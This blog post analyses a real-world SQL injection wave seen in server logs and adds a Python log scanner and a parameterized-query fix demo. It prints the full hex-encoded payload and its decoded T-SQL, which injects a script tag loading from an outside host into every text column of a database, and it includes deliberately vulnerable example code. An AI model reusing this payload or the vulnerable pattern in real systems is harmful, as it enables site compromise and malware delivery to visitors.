Once in a while, I comb through my server logs to see if there is any unusual activity. Among all the types of "attacks" that I can identify in my server logs, it seems that SQL injection attacks are still the most common.

The latest wave of such attacks looks as follows:

?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C4152452040
54207661726368617228323535292C4043207661726368617228343030302920
4445434C415245205461626C655F437572736F7220435552534F5220464F5220
73656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626
A6563747320612C737973636F6C756D6E73206220776865726520612E69643D
622E696420616E6420612E78747970653D27752720616E642028622E7874797
0653D3939206F7220622E78747970653D3335206F7220622E78747970653D32
3331206F7220622E78747970653D31363729204F50454E205461626C655F437
572736F72204645544348204E4558542046524F4D20205461626C655F437572
736F7220494E544F2040542C4043205748494C4528404046455443485F53544
15455533D302920424547494E20657865632827757064617465205B272B4054
2B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C73
6372697074207372633D22687474703A2F2F777777332E73733131716E2E636
E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2D2727
2B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B652
0272725223E3C2F7469746C653E3C736372697074207372633D22687474703A
2F2F777777332E73733131716E2E636E2F63737273732F6E65772E68746D223E
3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4
D20205461626C655F437572736F7220494E544F2040542C404320454E442043
4C4F5345205461626C655F437572736F72204445414C4C4F434154452054616
26C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);


The technique used by the attacker is extremely simple. The request builds a dynamic SQL statement whose body is HEX encoded (many converters, like this one, can be used to translate the HEX back to ASCII), and then executes it with EXEC:

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www3.ss11qn.cn/csrss/new.htm"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www3.ss11qn.cn/csrss/new.htm"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor


The above SQL code walks a cursor over every text-type column of every user table in the current database and prepends the script tag shown above to each value. The "not like" clause skips values that already contain the tag, so each entry is "infected" only once, which presumably makes the change less suspicious.
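Decoding these payloads by hand with a web converter gets old quickly, so here is a small log scanner I use for this kind of triage. It is an added example, not part of the original post: it URL-decodes each request line, pulls out every 0x... literal, decodes it to ASCII and flags the line if the raw or decoded text contains T-SQL keywords. The two log lines are constructed for the example; the hex literal in the second one is just the opening bytes of the payload quoted above.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (not taken from a real server). The hex literal
# in the second line is the start of the payload above and decodes to
# "DECLARE @T varchar(255),@C varchar(4000) ".
SAMPLE_LOG = [
    'GET /page.asp?id=42 HTTP/1.1 200',
    'GET /page.asp?id=42;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x'
    '4445434C4152452040'
    '54207661726368617228323535292C4043207661726368617228343030302920'
    '%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1 200',
]

# Require at least 8 hex digits so short values such as colour codes are ignored.
HEX_LITERAL = re.compile(r'0x([0-9A-Fa-f]{8,})')

# Keywords that have no business in a query string of a normal web request.
SUSPICIOUS = ('DECLARE ', 'CAST(', 'EXEC(', 'CURSOR', 'SYSOBJECTS', 'SYSCOLUMNS')


def decode_hex_literals(line):
    """Return the ASCII text of every 0x... literal in a (URL-decoded) log line."""
    decoded = []
    for match in HEX_LITERAL.finditer(unquote(line)):
        hexstr = match.group(1)
        if len(hexstr) % 2:          # an odd number of digits cannot be a byte string
            continue
        decoded.append(bytes.fromhex(hexstr).decode('latin-1'))
    return decoded


def is_sql_injection_attempt(line):
    """True if the raw request or any decoded hex literal carries T-SQL keywords."""
    text = unquote(line).upper()
    for piece in decode_hex_literals(line):
        text += ' ' + piece.upper()
    return any(keyword in text for keyword in SUSPICIOUS)


def scan_log(lines):
    """Return (line_number, decoded_payloads) for every flagged line."""
    hits = []
    for number, line in enumerate(lines, 1):
        if is_sql_injection_attempt(line):
            hits.append((number, decode_hex_literals(line)))
    return hits


if __name__ == '__main__':
    for number, payloads in scan_log(SAMPLE_LOG):
        print(f'line {number}: suspicious request')
        for payload in payloads:
            print('  decoded:', payload)
```

Run it over a real access log one line at a time; the decoded text is what tells you whether a flagged request was a probe or a full payload like the one above, and whether it was aimed at your schema.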

The following google search:

http://www.google.com/search?hl=en&q=http%3A%2F%2Fwww0.douhunqn.cn%2Fcsrss%2Fw.js&btnG=Search

revealed that a large number of sites had been affected. This is quite striking, since SQL injection attacks have been around for a long time and simple techniques (e.g. stored procedures, parameterized queries, escaping special characters) prevent such exploits. But it is apparent that there are still many people out there who embed user input in SQL statements without taking any precautions…
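To make the point concrete, here is the vulnerable pattern beside the parameterized fix. This is an added example written for this post, not code from any affected site. It uses Python with an in-memory SQLite database as a stand-in for SQL Server; in the vulnerable version, executescript mimics a driver that runs batched statements (which is what lets the ";DECLARE ..." above execute), and the injected text appends a harmless marker instead of a script tag.

```python
import sqlite3

# Constructed malicious input: a valid id followed by a second, stacked statement.
# SQLite concatenates with ||, where SQL Server would use +.
INJECTED_INPUT = "42; UPDATE posts SET body = body || '<!-- injected -->'"
MARKER = '<!-- injected -->'


def make_db():
    """Fresh in-memory database with two rows of sample content."""
    conn = sqlite3.connect(':memory:')
    conn.execute('CREATE TABLE posts (id INTEGER PRIMARY KEY, body TEXT)')
    conn.executemany('INSERT INTO posts (id, body) VALUES (?, ?)',
                     [(1, 'hello'), (2, 'world')])
    conn.commit()
    return conn


def lookup_vulnerable(conn, user_input):
    """The 'before' code: user input pasted straight into the SQL text.

    executescript stands in for a driver that executes every statement in the
    batch, as classic ASP/ADO against SQL Server does. Whatever follows the ';'
    in user_input runs with the application's database privileges.
    """
    conn.executescript('SELECT body FROM posts WHERE id = ' + user_input)


def lookup_safe(conn, user_input):
    """The fix: the query text is fixed and the input travels as a parameter.

    The driver never parses user_input as SQL, so the stacked UPDATE is just
    an id value that matches nothing.
    """
    cur = conn.execute('SELECT body FROM posts WHERE id = ?', (user_input,))
    return [row[0] for row in cur.fetchall()]


def tainted_rows(conn):
    """Ids of rows whose body now carries the marker."""
    cur = conn.execute('SELECT id FROM posts WHERE body LIKE ?', ('%' + MARKER + '%',))
    return [row[0] for row in cur.fetchall()]


if __name__ == '__main__':
    db = make_db()
    lookup_vulnerable(db, INJECTED_INPUT)
    print('vulnerable lookup tainted rows:', tainted_rows(db))   # every row

    db = make_db()
    print('safe lookup returned:', lookup_safe(db, INJECTED_INPUT))
    print('safe lookup tainted rows:', tainted_rows(db))         # none
```

Escaping quotes would not have helped here either: the payload above contains no quote characters in the outer request at all, which is exactly why the attacker hex-encodes the inner statement. Parameterization fixes the class of problem rather than one encoding of it.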
